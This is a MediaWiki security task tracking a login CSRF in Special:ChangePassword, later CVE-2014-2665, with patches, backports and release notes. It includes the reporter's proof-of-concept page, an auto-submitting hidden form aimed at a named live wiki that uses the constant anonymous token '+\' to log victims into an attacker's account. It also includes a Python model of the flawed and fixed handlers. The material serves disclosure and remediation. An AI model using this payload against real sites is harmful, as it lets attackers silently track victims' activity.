Login csrf in Special:ChangePassword
Closed, ResolvedPublic

Description

Gopinath (via codex.galleryproject.org) reported a login csrf on Special:ChangePassword. Confirmed this in master. Note with the PoC, the victim must have an existing _session cookie on the target wiki, otherwise the login fails.

Special:ChangePassword should use a login token.

On Sun, Mar 9, 2014 at 12:16 PM, Bharat Mediratta <bharat@menalto.com> wrote:

Hi, Wikimedia folks - Gopinath is reporting a vulnerability in Mediawiki 1.22.3 which is running on codex.galleryproject.org - can you take a look at this and decide whether it's something you want to resolve in the Mediawiki codebase?

-Bharat

On Fri, Mar 7, 2014 at 10:14 PM, Gopinath <gopiengg@gmail.com> wrote:
Hi,
Through the CSRF code below, a user can be logged into the attacker's account without the user's knowledge. So the attacker can track the user's activity.
The user also won't know the attacker's account password. The attacker can request a password reset for his account and can get the value of the wpPassword parameter.

POC Code

<html>
<head>
</head>
<body onload="document.forms[0].submit();">
<form action="http://codex.galleryproject.org/Special:ChangePassword" method="POST">

<input type="hidden" name="returnto" value="Main Page" />
<!-- "+\" is MediaWiki's edit token for anonymous users, a constant rather than a per-session secret -->
<input type="hidden" name="token" value="+\" />
<input type="hidden" name="wpDomain" value="" />
<input type="hidden" name="wpName" value="Gopinath6" />
<input type="hidden" name="wpNewPassword" value="password1234" />
<input type="hidden" name="wpPassword" value="7qbuqjjsme" />
<input type="hidden" name="wpRetype" value="password1234" />

</form>
</body>
</html>

Regards
Gopinath


Version: 1.23.0
Severity: normal

bzimport set Reference to bz62497.
csteipp created this task. Via Legacy, Mar 10 2014, 5:47 PM
csteipp added a comment. Via Conduit, Mar 10 2014, 7:34 PM

Created attachment 14787
Add CSRF token on Special:ChangePassword

Attached: bug62497.patch

Anomie added a comment. Via Conduit, Mar 11 2014, 3:17 PM

The patch looks good to me.

csteipp added a comment. Via Conduit, Mar 26 2014, 1:29 PM

Early access for Wikia.

Mglaser added a comment. Via Conduit, Mar 26 2014, 10:06 PM

Do we already have a CVE for this bug?

csteipp added a comment. Via Conduit, Mar 26 2014, 10:15 PM

Not yet. I'll request one as soon as we make it public.

Mglaser added a comment. Via Conduit, Mar 26 2014, 11:15 PM

Created attachment 14927
Backport to REL1_22

Backported to the best of my knowledge. Special:ChangePassword tested. Can't reproduce the attack, so someone with a deeper understanding of this vulnerability should look at it and confirm it fixes the security issue.

attachment bug62497-122.patch ignored as obsolete

csteipp added a comment. Via Conduit, Mar 27 2014, 12:56 AM

Created attachment 14933
Backport to REL1_22

I hit a couple issues when testing your patch. I think this is a slightly better way to do it.

Attached: bug62497_122.patch

Mglaser added a comment. Via Conduit, Mar 27 2014, 9:27 AM

Created attachment 14938
Backport to REL1_21

Backport similar to 14933, so Chris' changes are already considered. Changing passwords was tested. Please look for potential security implications.

Attached: bug62497_121.patch

Mglaser added a comment. Via Conduit, Mar 27 2014, 9:50 AM

Created attachment 14939
Backport to REL1_19

Considering Chris' new version of the backport for REL1_22. Tested password change. Still works.

Attached: bug62497_119.patch

Grunny added a comment. Via Conduit, Mar 27 2014, 10:46 AM

Tested the 1.19 backport patch, and confirmed it fixes the vulnerability.

Mglaser added a comment. Via Conduit, Mar 28 2014, 1:37 AM

Fix is released in MW 1.19.14, 1.21.8 and 1.22.5. WMF sites are patched.

Wikinaut added a comment. Via Conduit, Mar 28 2014, 6:54 AM

Comment on attachment 14787
Add CSRF token on Special:ChangePassword

The token compare function is _not_ running in constant time. As we have a function for token comparison, we should use it here.
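
The two points raised on this task, the description's requirement that Special:ChangePassword use a session-bound login token instead of the edit token the PoC satisfies with the anonymous value "+\", and the constant-time comparison asked for above, modelled in one added example (standalone Python, not MediaWiki's code or its patch). The Session class, the wsLoginToken session key, the wpLoginToken field name and the form values are assumptions; the field names token/wpName/wpPassword/wpNewPassword/wpRetype come from the PoC.

```python
import hmac
import secrets

EDIT_TOKEN_SUFFIX = "+\\"  # MediaWiki's edit-token suffix; an anonymous user's edit token is just this constant

class Session:
    """Stand-in for the server-side session behind the _session cookie (modelled, not MediaWiki code)."""

    def __init__(self, user_secret=None):
        self.user_secret = user_secret  # None = anonymous visitor, the situation in the PoC
        self.data = {}

    def edit_token(self):
        # Logged-in users get a keyed value; anonymous sessions get the public constant.
        if self.user_secret is None:
            return EDIT_TOKEN_SUFFIX
        return hmac.new(self.user_secret, b"edit", "sha256").hexdigest() + EDIT_TOKEN_SUFFIX

    def login_token(self):
        # Random per-session value minted when the form is rendered; a cross-site page cannot read it.
        if "wsLoginToken" not in self.data:
            self.data["wsLoginToken"] = secrets.token_hex(16)
        return self.data["wsLoginToken"]

def safe_equals(expected, submitted):
    """Constant-time comparison; a missing or empty value on either side never matches."""
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())

def change_password_before(session, form):
    """Pre-fix shape: accept the edit token, which for an anonymous session is the guessable '+\\'."""
    if not safe_equals(session.edit_token(), form.get("token", "")):
        return "sessionfailure"
    return "success"  # the submitted account's password is changed and the victim is logged into it

def change_password_after(session, form):
    """Fixed shape: require the login token held in the submitting browser's own session."""
    if not safe_equals(session.data.get("wsLoginToken"), form.get("wpLoginToken", "")):
        return "sessionfailure"
    if form.get("wpNewPassword") != form.get("wpRetype"):
        return "badretype"
    return "success"

# Constructed submission using the field names from the PoC form (values are placeholders).
POC_FORM = {"token": "+\\", "wpName": "example-account", "wpPassword": "old-example",
            "wpNewPassword": "new-example", "wpRetype": "new-example"}
```

With a fresh anonymous session, the pre-fix handler accepts POC_FORM while the fixed handler rejects it, and only a form carrying the token that the same session minted (or a session-less submission from another browser, which fails) gets through.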

Wikinaut added a comment. Via Conduit, Mar 28 2014, 7:12 AM

see http://www.gossamer-threads.com/lists/wiki/mediawiki-cvs/436923 (well, this is essential for _password_ comparison, perhaps not necessarily needed for token comparison, as already discussed elsewhere)

Aklapper added a comment. Via Conduit, Mar 31 2014, 3:35 PM

For the record, https://www.mediawiki.org/w/index.php?title=Project:Support_desk#Session_Hijacking_error_after_Update_1.19.14_41441 lists an issue with the 1.19.14 tarball including the backport for this.

csteipp added a comment. Via Conduit, Apr 1 2014, 4:27 PM

Markus just released 1.19.15 to fix the password reset issue.

csteipp added a comment. Via Conduit, Apr 1 2014, 4:40 PM

Correction, Markus will release 1.19.15 tomorrow to fix the issue. Sorry about that.

csteipp added a comment. Via Conduit, Apr 1 2014, 8:59 PM

This was assigned CVE-2014-2665.

http://openwall.com/lists/oss-security/2014/04/01/7

The MITRE email also documents their understanding of "Login CSRF", which is good background if this issue pops up again.
